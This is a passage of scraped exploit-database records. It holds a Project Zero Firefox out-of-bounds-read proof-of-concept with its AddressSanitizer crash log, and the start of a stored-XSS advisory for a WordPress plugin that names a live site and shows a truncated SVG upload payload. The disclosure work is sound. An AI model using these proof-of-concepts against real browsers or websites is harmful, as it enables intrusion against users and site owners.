https://bugs.chromium.org/p/project-zero/issues/detail?id=1160\r\n \r\nMozilla bug tracker link: https://bugzilla.mozilla.org/show_bug.cgi?id=1343552\r\n \r\nThere is an out-of-bounds read vulnerability in Firefox. The vulnerability was confirmed on the nightly ASan build. \r\n \r\nPoC:\r\n \r\n=================================================================\r\n-->\r\n \r\n<style>\r\n.class1 { float: left; white-space: pre-line; }\r\n.class2 { border-bottom-style: solid; font-face: Arial; font-size: 7ex; }\r\n</style>\r\n<script>\r\nfunction go() {\r\n menuitem.appendChild(document.body.firstChild);\r\n canvas.toBlob(callback);\r\n}\r\nfunction callback() {\r\n var s = menu.style;\r\n s.setProperty(\"flex-direction\", \"row-reverse\");\r\n option.scrollBy();\r\n document.implementation.createHTMLDocument(\"foo\").adoptNode(progress);\r\n s.setProperty(\"flex-direction\", \"column\");\r\n canvas.toBlob(callback);\r\n}\r\n</script>\r\naaaaaaaaaaaaaaaaaa\r\n</head>\r\n<body onload=go()>\r\n<del class=\"class1\">\r\n<span class=\"class2\">\r\n<menu id=\"menu\">\r\n<menuitem>\r\n</menu>\r\n<menuitem id=\"menuitem\">\r\n<progress id=\"progress\">\r\n</del>\r\n<ol dir=\"rtl\">l+0</ol>\r\n<canvas id=\"canvas\">\r\n<option id=\"option\">\r\n \r\n<!--\r\n=================================================================\r\n \r\nASan log:\r\n \r\n=================================================================\r\n==104545==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x611000721ecc at pc 0x7fcef25af0e8 bp 0x7ffc23afd1b0 sp 0x7ffc23afd1a8\r\nREAD of size 4 at 0x611000721ecc thread T0\r\n #0 0x7fcef25af0e7 in IsSimpleGlyph /home/worker/workspace/build/src/gfx/thebes/gfxFont.h:785:46\r\n #1 0x7fcef25af0e7 in GetAdvanceForGlyph /home/worker/workspace/build/src/gfx/thebes/gfxTextRun.h:638\r\n #2 0x7fcef25af0e7 in GetAdvanceForGlyphs /home/worker/workspace/build/src/gfx/thebes/gfxTextRun.cpp:334\r\n #3 0x7fcef25af0e7 in gfxTextRun::GetAdvanceWidth(gfxTextRun::Range, gfxTextRun::PropertyProvider*, gfxFont::Spacing*) const /home/worker/workspace/build/src/gfx/thebes/gfxTextRun.cpp:1074\r\n #4 0x7fcef704ac7c in nsTextFrame::TrimTrailingWhiteSpace(mozilla::gfx::DrawTarget*) /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:9654:15\r\n #5 0x7fcef6d2a2ef in nsLineLayout::TrimTrailingWhiteSpaceIn(nsLineLayout::PerSpanData*, int*) /home/worker/workspace/build/src/layout/generic/nsLineLayout.cpp:2584:44\r\n #6 0x7fcef6d2a1c7 in nsLineLayout::TrimTrailingWhiteSpaceIn(nsLineLayout::PerSpanData*, int*) /home/worker/workspace/build/src/layout/generic/nsLineLayout.cpp:2531:11\r\n #7 0x7fcef6d2a1c7 in nsLineLayout::TrimTrailingWhiteSpaceIn(nsLineLayout::PerSpanData*, int*) /home/worker/workspace/build/src/layout/generic/nsLineLayout.cpp:2531:11\r\n #8 0x7fcef6d2b293 in nsLineLayout::TrimTrailingWhiteSpace() /home/worker/workspace/build/src/layout/generic/nsLineLayout.cpp:2654:3\r\n #9 0x7fcef6dcc03b in nsBlockFrame::PlaceLine(mozilla::BlockReflowInput&, nsLineLayout&, nsLineList_iterator, nsFloatManager::SavedState*, mozilla::LogicalRect&, int&, bool*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:4479:3\r\n #10 0x7fcef6dcabe3 in nsBlockFrame::DoReflowInlineFrames(mozilla::BlockReflowInput&, nsLineLayout&, nsLineList_iterator, nsFlowAreaRect&, int&, nsFloatManager::SavedState*, bool*, LineReflowStatus*, bool) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:4082:12\r\n #11 0x7fcef6dc0d6c in nsBlockFrame::ReflowInlineFrames(mozilla::BlockReflowInput&, nsLineList_iterator, bool*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3828:9\r\n #12 0x7fcef6dafacf in ReflowLine /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2834:5\r\n #13 0x7fcef6dafacf in nsBlockFrame::ReflowDirtyLines(mozilla::BlockReflowInput&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2370\r\n #14 0x7fcef6da5c1a in nsBlockFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:1237:3\r\n #15 0x7fcef6dc6e8d in nsBlockReflowContext::ReflowBlock(mozilla::LogicalRect const&, bool, nsCollapsingMargin&, int, bool, nsLineBox*, mozilla::ReflowInput&, nsReflowStatus&, mozilla::BlockReflowInput&) /home/worker/workspace/build/src/layout/generic/nsBlockReflowContext.cpp:306:3\r\n #16 0x7fcef6dd9001 in nsBlockFrame::ReflowFloat(mozilla::BlockReflowInput&, mozilla::LogicalRect const&, nsIFrame*, mozilla::LogicalMargin&, mozilla::LogicalMargin&, bool, nsReflowStatus&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:6272:5\r\n #17 0x7fcef6d4d19f in mozilla::BlockReflowInput::FlowAndPlaceFloat(nsIFrame*) /home/worker/workspace/build/src/layout/generic/BlockReflowInput.cpp:910:5\r\n #18 0x7fcef6d4b143 in mozilla::BlockReflowInput::AddFloat(nsLineLayout*, nsIFrame*, int) /home/worker/workspace/build/src/layout/generic/BlockReflowInput.cpp:627:14\r\n #19 0x7fcef6d21369 in AddFloat /home/worker/workspace/build/src/layout/generic/nsLineLayout.h:190:12\r\n #20 0x7fcef6d21369 in nsLineLayout::ReflowFrame(nsIFrame*, nsReflowStatus&, mozilla::ReflowOutput*, bool&) /home/worker/workspace/build/src/layout/generic/nsLineLayout.cpp:979\r\n #21 0x7fcef6dcb7bb in nsBlockFrame::ReflowInlineFrame(mozilla::BlockReflowInput&, nsLineLayout&, nsLineList_iterator, nsIFrame*, LineReflowStatus*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:4153:3\r\n #22 0x7fcef6dca446 in nsBlockFrame::DoReflowInlineFrames(mozilla::BlockReflowInput&, nsLineLayout&, nsLineList_iterator, nsFlowAreaRect&, int&, nsFloatManager::SavedState*, bool*, LineReflowStatus*, bool) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3954:5\r\n #23 0x7fcef6dc0d6c in nsBlockFrame::ReflowInlineFrames(mozilla::BlockReflowInput&, nsLineList_iterator, bool*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3828:9\r\n #24 0x7fcef6dafacf in ReflowLine /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2834:5\r\n #25 0x7fcef6dafacf in nsBlockFrame::ReflowDirtyLines(mozilla::BlockReflowInput&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2370\r\n #26 0x7fcef6da5c1a in nsBlockFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:1237:3\r\n #27 0x7fcef6dc6e8d in nsBlockReflowContext::ReflowBlock(mozilla::LogicalRect const&, bool, nsCollapsingMargin&, int, bool, nsLineBox*, mozilla::ReflowInput&, nsReflowStatus&, mozilla::BlockReflowInput&) /home/worker/workspace/build/src/layout/generic/nsBlockReflowContext.cpp:306:3\r\n #28 0x7fcef6dbc4da in nsBlockFrame::ReflowBlockFrame(mozilla::BlockReflowInput&, nsLineList_iterator, bool*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3462:7\r\n #29 0x7fcef6dafafa in ReflowLine /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2831:5\r\n #30 0x7fcef6dafafa in nsBlockFrame::ReflowDirtyLines(mozilla::BlockReflowInput&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2370\r\n #31 0x7fcef6da5c1a in nsBlockFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:1237:3\r\n #32 0x7fcef6e0ada0 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, mozilla::WritingMode const&, mozilla::LogicalPoint const&, nsSize const&, unsigned int, nsReflowStatus&, nsOverflowContinuationTracker*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:1028:3\r\n #33 0x7fcef6e09555 in nsCanvasFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /home/worker/workspace/build/src/layout/generic/nsCanvasFrame.cpp:711:5\r\n #34 0x7fcef6e0ada0 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, mozilla::WritingMode const&, mozilla::LogicalPoint const&, nsSize const&, unsigned int, nsReflowStatus&, nsOverflowContinuationTracker*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:1028:3\r\n #35 0x7fcef6eb0394 in nsHTMLScrollFrame::ReflowScrolledFrame(mozilla::ScrollReflowInput*, bool, bool, mozilla::ReflowOutput*, bool) /home/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:552:3\r\n #36 0x7fcef6eb1840 in nsHTMLScrollFrame::ReflowContents(mozilla::ScrollReflowInput*, mozilla::ReflowOutput const&) /home/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:664:3\r\n #37 0x7fcef6eb5073 in nsHTMLScrollFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /home/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:1039:3\r\n #38 0x7fcef6e1b964 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, int, int, unsigned int, nsReflowStatus&, nsOverflowContinuationTracker*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:1072:3\r\n #39 0x7fcef6d8b760 in mozilla::ViewportFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /home/worker/workspace/build/src/layout/generic/ViewportFrame.cpp:326:7\r\n #40 0x7fcef6b89187 in mozilla::PresShell::DoReflow(nsIFrame*, bool) /home/worker/workspace/build/src/layout/base/PresShell.cpp:9202:3\r\n #41 0x7fcef6b9cde4 in mozilla::PresShell::ProcessReflowCommands(bool) /home/worker/workspace/build/src/layout/base/PresShell.cpp:9375:24\r\n #42 0x7fcef6b9bcf6 in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/PresShell.cpp:4174:11\r\n #43 0x7fcef2c4646e in FlushPendingNotifications /home/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:598:5\r\n #44 0x7fcef2c4646e in nsDocument::FlushPendingNotifications(mozilla::FlushType) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:7961\r\n #45 0x7fcef2a1f2b4 in GetPrimaryFrame /home/worker/workspace/build/src/dom/base/Element.cpp:2164:5\r\n #46 0x7fcef2a1f2b4 in mozilla::dom::Element::GetScrollFrame(nsIFrame**, bool) /home/worker/workspace/build/src/dom/base/Element.cpp:637\r\n #47 0x7fcef2a20871 in mozilla::dom::Element::ScrollBy(mozilla::dom::ScrollToOptions const&) /home/worker/workspace/build/src/dom/base/Element.cpp:794:28\r\n #48 0x7fcef4112002 in mozilla::dom::ElementBinding::scrollBy(JSContext*, JS::Handle<JSObject*>, mozilla::dom::Element*, JSJitMethodCallArgs const&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/ElementBinding.cpp:2492:7\r\n #49 0x7fcef45cdd27 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2953:13\r\n #50 0x7fcefa0cc04f in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15\r\n #51 0x7fcefa0cc04f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448\r\n #52 0x7fcefa0b2970 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:499:12\r\n #53 0x7fcefa0b2970 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2955\r\n #54 0x7fcefa097c9b in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12\r\n #55 0x7fcefa0cc366 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15\r\n #56 0x7fcefa0cca42 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10\r\n #57 0x7fcefaa9cd1c in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2878:12\r\n #58 0x7fcef4242c05 in mozilla::dom::BlobCallback::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Blob*, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLCanvasElementBinding.cpp:81:8\r\n #59 0x7fcef475613f in Call /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/HTMLCanvasElementBinding.h:180:12\r\n #60 0x7fcef475613f in mozilla::dom::CanvasRenderingContextHelper::ToBlob(JSContext*, nsIGlobalObject*, mozilla::dom::BlobCallback&, nsAString_internal const&, JS::Handle<JS::Value>, mozilla::ErrorResult&)::EncodeCallback::ReceiveBlob(already_AddRefed<mozilla::dom::Blob>) /home/worker/workspace/build/src/dom/canvas/CanvasRenderingContextHelper.cpp:56\r\n #61 0x7fcef2acde86 in mozilla::dom::EncodingCompleteEvent::Run() /home/worker/workspace/build/src/dom/base/ImageEncoder.cpp:105:12\r\n #62 0x7fcef0217012 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1264:7\r\n #63 0x7fcef02138c0 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10\r\n #64 0x7fcef10322bf in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21\r\n #65 0x7fcef0fa3658 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3\r\n #66 0x7fcef0fa3658 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231\r\n #67 0x7fcef0fa3658 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211\r\n #68 0x7fcef63ffdbf in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3\r\n #69 0x7fcef9a88d81 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:19\r\n #70 0x7fcef9c5243c in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4476:10\r\n #71 0x7fcef9c53f38 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4654:8\r\n #72 0x7fcef9c551fc in XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4745:16\r\n #73 0x4dffaf in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:237:10\r\n #74 0x4dffaf in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:308\r\n #75 0x7fcf0b63282f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291\r\n #76 0x41c3d8 in _start (/home/ifratric/p0/latest/firefox/firefox+0x41c3d8)\r\n \r\n0x611000721ecc is located 0 bytes to the right of 204-byte region [0x611000721e00,0x611000721ecc)\r\nallocated by thread T0 here:\r\n #0 0x4b2e4b in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3\r\n #1 0x7fcef25b9900 in AllocateStorageForTextRun /home/worker/workspace/build/src/gfx/thebes/gfxTextRun.cpp:122:21\r\n #2 0x7fcef25b9900 in Create /home/worker/workspace/build/src/gfx/thebes/gfxTextRun.cpp:139\r\n #3 0x7fcef25b9900 in gfxFontGroup::MakeTextRun(unsigned char const*, unsigned int, gfxTextRunFactory::Parameters const*, unsigned int, gfxMissingFontRecorder*) /home/worker/workspace/build/src/gfx/thebes/gfxTextRun.cpp:2075\r\n #4 0x7fcef6ff6f49 in BuildTextRunsScanner::BuildTextRunForFrames(void*) /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:2394:17\r\n #5 0x7fcef6fefe0b in BuildTextRunsScanner::FlushFrames(bool, bool) /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:1633:17\r\n #6 0x7fcef6ffb09d in BuildTextRunsScanner::ScanFrame(nsIFrame*) /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:1902:9\r\n #7 0x7fcef6ffb72f in BuildTextRunsScanner::ScanFrame(nsIFrame*) /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:1942:5\r\n #8 0x7fcef6ffb72f in BuildTextRunsScanner::ScanFrame(nsIFrame*) /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:1942:5\r\n #9 0x7fcef7003a8a in BuildTextRuns /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:1534:7\r\n #10 0x7fcef7003a8a in nsTextFrame::EnsureTextRun(nsTextFrame::TextRunType, mozilla::gfx::DrawTarget*, nsIFrame*, nsLineList_iterator const*, unsigned int*) /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:2860\r\n #11 0x7fcef703d429 in nsTextFrame::AddInlineMinISizeForFlow(nsRenderingContext*, nsIFrame::InlineMinISizeData*, nsTextFrame::TextRunType) /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:8329:5\r\n #12 0x7fcef70405ef in nsTextFrame::AddInlineMinISize(nsRenderingContext*, nsIFrame::InlineMinISizeData*) /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:8499:7\r\n #13 0x7fcef6e1a982 in nsContainerFrame::DoInlineIntrinsicISize(nsRenderingContext*, nsIFrame::InlineIntrinsicISizeData*, nsLayoutUtils::IntrinsicISizeType) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:897:9\r\n #14 0x7fcef6e1a982 in nsContainerFrame::DoInlineIntrinsicISize(nsRenderingContext*, nsIFrame::InlineIntrinsicISizeData*, nsLayoutUtils::IntrinsicISizeType) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:897:9\r\n #15 0x7fcef6d9f622 in nsBlockFrame::GetMinISize(nsRenderingContext*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:774:11\r\n #16 0x7fcef6e1b150 in ShrinkWidthToFit /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:5566:22\r\n #17 0x7fcef6e1b150 in nsContainerFrame::ComputeAutoSize(nsRenderingContext*, mozilla::WritingMode, mozilla::LogicalSize const&, int, mozilla::LogicalSize const&, mozilla::LogicalSize const&, mozilla::LogicalSize const&, nsIFrame::ComputeSizeFlags) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:942\r\n #18 0x7fcef6e2260e in nsFrame::ComputeSize(nsRenderingContext*, mozilla::WritingMode, mozilla::LogicalSize const&, int, mozilla::LogicalSize const&, mozilla::LogicalSize const&, mozilla::LogicalSize const&, nsIFrame::ComputeSizeFlags) /home/worker/workspace/build/src/layout/generic/nsFrame.cpp:4822:24\r\n #19 0x7fcef6d4fb36 in FloatMarginISize(mozilla::ReflowInput const&, int, nsIFrame*, mozilla::SizeComputationInput const&) /home/worker/workspace/build/src/layout/generic/BlockReflowInput.cpp:692:5\r\n #20 0x7fcef6d4c21f in mozilla::BlockReflowInput::FlowAndPlaceFloat(nsIFrame*) /home/worker/workspace/build/src/layout/generic/BlockReflowInput.cpp:757:30\r\n #21 0x7fcef6d4b143 in mozilla::BlockReflowInput::AddFloat(nsLineLayout*, nsIFrame*, int) /home/worker/workspace/build/src/layout/generic/BlockReflowInput.cpp:627:14\r\n #22 0x7fcef6d21369 in AddFloat /home/worker/workspace/build/src/layout/generic/nsLineLayout.h:190:12\r\n #23 0x7fcef6d21369 in nsLineLayout::ReflowFrame(nsIFrame*, nsReflowStatus&, mozilla::ReflowOutput*, bool&) /home/worker/workspace/build/src/layout/generic/nsLineLayout.cpp:979\r\n #24 0x7fcef6dcb7bb in nsBlockFrame::ReflowInlineFrame(mozilla::BlockReflowInput&, nsLineLayout&, nsLineList_iterator, nsIFrame*, LineReflowStatus*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:4153:3\r\n #25 0x7fcef6dca446 in nsBlockFrame::DoReflowInlineFrames(mozilla::BlockReflowInput&, nsLineLayout&, nsLineList_iterator, nsFlowAreaRect&, int&, nsFloatManager::SavedState*, bool*, LineReflowStatus*, bool) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3954:5\r\n #26 0x7fcef6dc0d6c in nsBlockFrame::ReflowInlineFrames(mozilla::BlockReflowInput&, nsLineList_iterator, bool*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3828:9\r\n #27 0x7fcef6dafacf in ReflowLine /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2834:5\r\n #28 0x7fcef6dafacf in nsBlockFrame::ReflowDirtyLines(mozilla::BlockReflowInput&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2370\r\n #29 0x7fcef6da5c1a in nsBlockFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:1237:3\r\n #30 0x7fcef6dc6e8d in nsBlockReflowContext::ReflowBlock(mozilla::LogicalRect const&, bool, nsCollapsingMargin&, int, bool, nsLineBox*, mozilla::ReflowInput&, nsReflowStatus&, mozilla::BlockReflowInput&) /home/worker/workspace/build/src/layout/generic/nsBlockReflowContext.cpp:306:3\r\n #31 0x7fcef6dbc4da in nsBlockFrame::ReflowBlockFrame(mozilla::BlockReflowInput&, nsLineList_iterator, bool*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3462:7\r\n #32 0x7fcef6dafafa in ReflowLine /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2831:5\r\n #33 0x7fcef6dafafa in nsBlockFrame::ReflowDirtyLines(mozilla::BlockReflowInput&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2370\r\n #34 0x7fcef6da5c1a in nsBlockFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:1237:3\r\n #35 0x7fcef6e0ada0 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, mozilla::WritingMode const&, mozilla::LogicalPoint const&, nsSize const&, unsigned int, nsReflowStatus&, nsOverflowContinuationTracker*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:1028:3\r\n #36 0x7fcef6e09555 in nsCanvasFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, nsReflowStatus&) /home/worker/workspace/build/src/layout/generic/nsCanvasFrame.cpp:711:5\r\n \r\nSUMMARY: AddressSanitizer: heap-buffer-overflow /home/worker/workspace/build/src/gfx/thebes/gfxFont.h:785:46 in IsSimpleGlyph\r\nShadow bytes around the buggy address:\r\n 0x0c22800dc380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c22800dc390: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd\r\n 0x0c22800dc3a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x0c22800dc3b0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa\r\n 0x0c22800dc3c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n=>0x0c22800dc3d0: 00 00 00 00 00 00 00 00 00[04]fa fa fa fa fa fa\r\n 0x0c22800dc3e0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd\r\n 0x0c22800dc3f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd\r\n 0x0c22800dc400: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa\r\n 0x0c22800dc410: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c22800dc420: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==104545==ABORTING\r\n-->\n\n# 0day.today [2018-02-20] #", "sourceHref": "https://0day.today/exploit/27840", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-02-15T21:19:38", "references": [], "description": "WordPress FancyProductDesigner plugin versions prior to 3.4.2 suffer from a persistent cross site scripting vulnerability due to improper sanitization, allowing malicious .svg file uploads.", "edition": 1, "reporter": "Project Insecurity", "published": "2017-05-03T00:00:00", "title": "WordPress FancyProductDesigner 3.4.2 Stored XSS Vulnerability", "type": "zdt", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-05-03T00:00:00", "href": "https://0day.today/exploit/description/27710", "id": "1337DAY-ID-27710", "sourceData": "[+]---------------------------------------------------------[+]\r\n | Vulnerable Software: FancyProductDesigner(WP plugin) |\r\n | Vendor: http://fancyproductdesigner.com |\r\n | Vulnerability Type: Stored XSS + FPD / File upload |\r\n | Date Released: 29/04/2017 |\r\n | Released by: 5tarboy (@insecurity) |\r\n [+]---------------------------------------------------------[+]\r\n\r\nFancy Product Designer is a paid wordpress plugin ($50 fee) that allows users to upload custom products of their choice\r\nto the site. The upload form claims that it only allows files of PNG and JPG format, but it is possible to upload SVG\r\nfiles also. There are estimated 40,000-50,000 vulnerable sites. \r\n\r\nIn order to replicate this vulnerability you navigate to the product upload page and simply upload an .svg payload.\r\nHere is an example: https://www.saltsidecreations.com/product/ozark-20-oz/\r\nIt is possible to upload an .svg file via the image upload form - the file will be stored at http://[HOST]/wp-content/uploads/\r\n\r\nHere is an example SVG file that can be uploaded (resulting in persistent/stored XSS):\r\n------------------------------------------------------------------------------------------------------------\r\n\r\n<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?>\r\n<!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 20010904//EN\" \"http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/svg10.dtd\">\r\n<svg version=\"1.0\" xmlns=\"http://www.w3.org/2000/svg\" width=\"300.000000pt\" height=\"300.000000pt\" viewBox=\"0 0 300.000000 300.000000\" preserveAspectRatio=\"xMidYMid meet\">\r\n <metadata>\r\n twitter: @insecurity\r\n </metadata>\r\n <g transform=\"translate(0.000000,300.000000) scale(0.100000,-0.100000)\"\r\n fill=\"#000000\" stroke=\"none\">\r\n <path d=\"M128 2910 c-1 -49 -2 -100 -2 -112 -1 -19 4 -23 27 -23 15 0 27 3 27 8 0 4 0 54 0 112 l0 105 -25 0 c-25 0 -25 -1 -27 -90z m29 -27 c-3 -10 -5 -2 -5 17 0 19 2 27 5 18 2 -10 2 -26 0 -35z m0 -45 c-3 -8 -6 -5 -6 6 -1 11 2 17 5 13 3 -3 4 -12 1 -19z\"/>\r\n <path d=\"M290 2908 c0 -51 -3 -102 -6 -113 -5 -19 0 -20 85 -20 l91 0 0 113 c0 68 -4 112 -10 112 -10 0 -12 -9 -13 -72 0 -21 -4 -38 -9 -38 -4 0 -8 11 -8 24 0 44 -10 56 -38 49 -20 -5 -23 -3 -17 8 8 12 6 12 -8 1 -9 -8 -21 -11 -27 -7 -6 4 -10 3 -9 -2 1 -4 1 -21 0 -37 -2 -45 -12 -24 -14 28 -2 86 -17 46 -17 -46z m110 -21 l0 -62 -30 -1 -30 -2 0 64 0 64 30 0 30 0 0 -63z m30 -62 c-8 -9 -8 -15 0 -18 7 -4 7 -5 0 -3 -7 1 -11 5 -11 9 1 4 1 22 2 40 0 30 1 31 10 8 6 -16 6 -28 -1 -36z m-90 -16 c0 -5 -7 -9 -15 -9 -15 0 -20 12 -9 23 8 8 24 -1 24 -14z\"/>\r\n <path d=\"M600 2888 l0 -113 90 0 90 0 0 113 c0 93 -3 112 